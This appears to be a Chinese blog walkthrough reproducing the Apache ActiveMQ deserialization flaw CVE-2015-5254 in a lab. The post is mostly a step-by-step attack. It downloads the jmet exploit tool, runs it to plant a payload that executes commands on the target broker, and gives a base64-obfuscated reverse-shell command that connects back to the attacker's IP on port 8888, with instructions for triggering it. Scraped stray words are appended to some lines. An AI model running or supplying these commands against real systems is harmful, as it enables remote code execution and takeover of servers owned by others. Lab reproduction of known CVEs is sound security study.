ActiveMQ反序列化漏洞(CVE-2015-5254)復現

簡介: Apache ActiveMQ是Apache軟件基金會所研發的一套開源的消息中間件,它支持Java消息服務,集羣,Spring Framework等。Apache ActiveMQ 5.13.0以前5.x版本中存在安全漏洞,該漏洞源於程序沒有限制可在代理中序列化的類。遠程***者可藉助特製的序列化的Java消息服務(JMS)ObjectMessage對象利用該漏洞執行任意代碼。


1.首先在kali裏面執行如下命令:java

cd var/opt  

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

mkdir external

在這裏插入圖片描述

2.輸入:git

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120 61616github


註釋:-Q指定隊列消息名,-I指定JMS客戶端,這裏是ActiveMQ,-Y指定具體的命令,-Yp指定payload類型,其後分別是ActiveMQ所在機器的ip及工做端口shell


在這裏插入圖片描述

3.如今會給目標的ActiveMQ添加一個名爲事件的隊列,能夠咱們經過http://192.168.199.120:8161/admin/browse.jsp?JMSDestination=event看到這個隊列中全部消息
在這裏插入圖片描述
4.點擊消息可觸發命令執行
在這裏插入圖片描述
5.而後使用反彈shell的命令輸入:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616安全

前面是輸入本身的IP後進行的編碼 後面是輸入被***者的IPbash

在這裏插入圖片描述

在這裏插入圖片描述
6.執行完之後會出現一個序號 而後再主頁裏面觸發 在進行監聽就能夠了
在這裏插入圖片描述jsp

相關文章
相關標籤/搜索